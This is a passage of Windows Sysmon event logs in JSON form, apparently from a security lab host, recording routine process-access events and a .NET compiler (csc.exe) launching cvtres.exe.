{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5608,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5609,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5610,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5611,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5612,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5613,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.073\r\nProcessGuid: {41C8662E-20D8-5F25-0000-0010EC050900}\r\nProcessId: 1348\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESCF1F.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC519C8E77F5B74145BC8DCB2875AB493D.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-001050020900}\r\nParentProcessId: 4800\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lgro13a1.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.073","ProcessGuid":"{41C8662E-20D8-5F25-0000-0010EC050900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESCF1F.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC519C8E77F5B74145BC8DCB2875AB493D.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-001050020900}","ParentProcessId":"4800","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lgro13a1.cmdline\"","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5614,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-001050020900}\r\nSourceProcessId: 4800\r\nSourceThreadId: 4076\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-0010EC050900}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-001050020900}","SourceProcessId":"4800","SourceThreadId":"4076","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-0010EC050900}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
